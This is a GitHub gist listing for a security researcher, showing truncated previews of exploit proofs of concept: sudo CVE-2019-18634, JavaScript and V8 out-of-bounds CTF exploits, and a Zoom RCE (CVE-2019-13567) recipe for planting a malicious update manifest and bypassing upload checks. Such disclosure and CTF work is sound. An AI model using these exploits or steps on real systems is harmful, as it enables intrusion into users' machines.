Skip to content

Instantly share code, notes, and snippets.

View wbowling's full-sized avatar

William Bowling wbowling

298 followers · 3 following
View GitHub Profile
@wbowling
wbowling / CVE-2019-18634.py
Last active September 8, 2020 23:03
POC for CVE-2019-18634
#!/usr/bin/python
import os
import pty
from pwn import process, sleep, write, read, listen, p64
"""
From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401:
} else if (c == sudo_term_kill) {
@wbowling
wbowling / babyjs.js
Created April 20, 2019 11:45
TG:HACK 2019 - Baby's First JavaScript Exploitation
let oob_arr = [1.1, 0x61616161, 3.3];
function getSetValue(i, v) {
if (v) {
oob_arr[i] = v;
} else {
return oob_arr[i];
}
}
@wbowling
wbowling / pwn.js
Last active April 20, 2021 21:42
starCTF (*CTF) 2019 oob-v8
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;
var arr1 = [1.1];
var arr2 = [Date];
var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();
@wbowling
wbowling / 0_reuse_code.js
Last active April 20, 2021 21:43
Here are some things you can do with Gists in GistBox.
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console
@wbowling
wbowling / rand.py
Created February 21, 2018 00:44
microsoft c runtime implementation of rand srand in python
#!/usr/bin/env python
def srand(s):
global seed
seed = s
# microsoft c runtime implementation
def rand():
global seed
seed = (seed * 214013 + 2531011) % 2**64
@wbowling
wbowling / decrypt.py
Last active October 1, 2021 17:13
Decryptor for signalino - Midnight Sun CTF 2021
#!/usr/bin/env python3
"""
Based on https://github.com/xperylabhub/ios_keychain_decrypter/blob/d7f3089067816cd2adc1ce910c9e1b927a356f37/keychain_decrypt.py#L113
"""
import plistlib
from bpylist import archiver, archive_types
import dataclasses
from Crypto.Cipher import AES
@wbowling
wbowling / README.md
Last active January 1, 2022 22:33
Zoom RCE - CVE-2019-13567

POC - https://youtu.be/zGSLBDo3N7s

  1. Create a malicious update manifest with the Package-url pointing a server you control:
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
  1. Upload the manifest it to a .zoom.us domain, one example is as the icon for a new https://marketplace.zoom.us/ app (there are client side checks to see if it's an image but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg